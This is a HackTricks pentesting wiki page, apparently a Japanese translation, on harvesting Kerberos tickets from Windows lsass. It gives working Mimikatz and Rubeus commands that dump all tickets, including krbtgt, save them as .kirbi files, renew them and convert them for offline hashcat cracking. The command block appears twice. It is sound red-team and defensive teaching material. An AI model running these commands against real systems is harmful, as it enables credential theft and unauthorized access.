Harvesting tickets from Windows

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

Windowsのチケットは、セキュリティポリシーを処理するlsass（ローカルセキュリティ認証局サブシステムサービス）プロセスによって管理および保存されます。これらのチケットを抽出するには、lsassプロセスとインターフェースを取る必要があります。非管理者ユーザーは自分のチケットにのみアクセスでき、管理者はシステム上のすべてのチケットを抽出する権限を持っています。そのような操作には、MimikatzとRubeusというツールが広く使用されており、それぞれ異なるコマンドと機能を提供しています。

Mimikatz

Mimikatzは、Windowsのセキュリティと対話できる多目的ツールです。チケットの抽出だけでなく、さまざまな他のセキュリティ関連の操作にも使用されます。

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeusは、Kerberosのインタラクションと操作のために特別に設計されたツールです。チケットの抽出と処理、その他のKerberos関連の活動に使用されます。

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

これらのコマンドを使用する際は、<BASE64_TICKET>や<luid>のようなプレースホルダーを実際のBase64エンコードされたチケットとログオンIDにそれぞれ置き換えることを確認してください。これらのツールは、チケットの管理やWindowsのセキュリティメカニズムとの対話に関して広範な機能を提供します。

参考文献

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Previous88tcp/udp - Pentesting Kerberos NextHarvesting tickets from Linux

Last updated 4 months ago

# Dumping all tickets using Rubeus .\Rubeus dump [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) # Listing all tickets .\Rubeus.exe triage # Dumping a specific ticket by LUID .\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) # Renewing a ticket .\Rubeus.exe renew /ticket:<BASE64_TICKET> # Converting a ticket to hashcat format for offline cracking .\Rubeus.exe hash /ticket:<BASE64_TICKET>